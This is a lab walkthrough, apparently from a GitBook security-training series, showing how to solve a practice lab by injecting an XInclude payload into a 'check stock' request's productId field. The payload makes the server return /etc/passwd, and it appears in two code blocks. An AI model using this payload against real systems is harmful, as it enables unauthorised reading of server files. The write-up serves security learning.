# Exploiting XInclude to retrieve files

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F8CoJ4VEqInyW7BZPFOYF%2Fimage.png?alt=media&#x26;token=a3182909-daf1-4664-9b72-3cf23776ddea" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Exploitation</mark>

the lab has a "check stock" feature that parses XML input

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FSvZ1q2eLDQqbAT3WDhgI%2Fimage.png?alt=media&#x26;token=813cffcd-0384-440b-be12-3a754db1b707" alt=""><figcaption></figcaption></figure></div>

send to repeater

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FyvdFM2OBIb0QidXADuN9%2Fimage.png?alt=media&#x26;token=557bb1e8-6b98-4bdc-a5e3-09afabe9070a" alt=""><figcaption></figcaption></figure></div>

This application **receive client-submitted data, embed it on the server-side into an XML document, and then parse the document**

In this situation, you cannot carry out a classic XXE attack, because **you don't control the entire XML** document and so cannot define or modify a `DOCTYPE` element. However, you might be able to use `XInclude` instead.

`XInclude` is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an `XInclude` attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

To perform an `XInclude` attack, you need to reference the `XInclude` namespace and provide the path to the file that you wish to include. For example

```markup
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```

so let's go to the "check store" request that we've sent to repeater and send the XInclude payload within the productId

```markup
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FAJQayMeTer510CDyiG8T%2Fimage.png?alt=media&#x26;token=e2ffb0eb-3e86-4661-865e-49741001dd34" alt=""><figcaption></figcaption></figure></div>

and we have solved the lab&#x20;

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FxJVt2U9PCrSxAQz7ZmHC%2Fimage.png?alt=media&#x26;token=547c0a16-6311-4667-ad68-90827bfb180b" alt=""><figcaption></figcaption></figure></div>

hope you found this walkthrough easy to understand and follow

Greeting From [<mark style="color:red;">**Sayonara**</mark>](https://github.com/ismail-arame)